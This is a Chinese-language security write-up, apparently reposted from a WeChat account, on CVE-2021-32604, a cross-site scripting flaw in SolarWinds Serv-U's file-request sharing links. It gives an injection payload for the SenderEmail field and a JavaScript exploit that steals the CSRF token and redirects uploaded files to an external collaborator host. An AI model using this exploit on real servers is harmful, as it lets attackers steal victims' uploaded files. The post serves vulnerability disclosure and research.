Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

admin
admin
admin
140350
文章
117
评论
2021年11月17日03:54:04评论161 views1字数 2123阅读7分4秒阅读模式
Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)点击上方蓝字关注我们


概述


研究人员在 SolarWinds Serv-U FTP 服务器中发现了一个有趣的漏洞。尽管初始向量需要身份验证,但低权限用户能够创建可公开访问的URL,当受害者访问该URL时将触发XSS有效载荷。


Serv-U包含两个功能来发送和接收来自其他用户的文件,在测试“请求文件”功能时,研究人员注意到发件人电子邮件输入被放置在可公开访问的共享URL中时没有被编码。这意味着攻击者可以向受害者发送一个共享URL来触发XSS漏洞。


漏洞复现


以下步骤是在Serv-U 15.2.3版本上测试的,通过身份验证后,用户可以转到“请求文件”选项卡以生成文件请求URL,如下图所示:


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


使用虚拟数据并发送请求,会显示可公开访问的共URL:


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


检查生成的URL会显示文件上传表单。在此处上传的文件将被发送回链接创建者的Serv-U文件夹。


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


现在,如果我们修改原始链接生成请求,并在“SenderEmail”字段中包含一个XSS 有效载荷,例如"'/><script>alert(7)%3b</script>%40localhost.local


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


然后从响应中获取“ShareURL”。


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


这样一来,就成功在可公开访问的共享URL上获得XSS了。


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


漏洞利用

由于漏洞利用使用了Ajax异步调用,因此我们需要稍作调整才能将文件正确上传到 Serv-U同时发送出去。脚本可以简单地托管,然后使用<script>标签通过XSS注入。简而言之,具体步骤如下:


  • 从页面抓取当前CSRF令牌

  • 重写“SubmitForm”函数,改为发布到外部主机

  • 调用Ajax方法将文件POST到原始Serv-U主机,以确保满足原始承诺


var csrftoken = $('script').text().match(/(&CsrfToken='+")(.*?)";/)[2];function SubmitForm(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {  var bSubmitted = false;  SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual);  if (rForm != null && rForm != undefined && rFormsTargetFrame != null && rFormsTargetFrame != undefined && sFileName != undefined && sFileName != null && sFileName != '' && nTransferID > 0) {    if (bIsVirtual == undefined || bIsVirtual == null)      bIsVirtual = 0;    var sAction = 'http://SOMEURL.burpcollaborator.net/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken;    rForm.setAttribute('action', sAction);    rFormsTargetFrame.onload = null;    rFormsTargetFrame.src = '/Web Client/Share/MultipleFileUploadResetFrame.htm';    rForm.submit();    bSubmitted = true;  } else    ASSERT('Cannot submit form because function parameters are invalid.');  return bSubmitted;}
function SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {  jQuery.ajax({      url: '/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken,      data: new FormData(rForm),      cache: false,      contentType: false,      processData: false,      method: 'POST'  });}


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

END



Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


好文!必须在看

本文始发于微信公众号(SecTr安全团队):Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月17日03:54:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)https://cn-sec.com/archives/414565.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息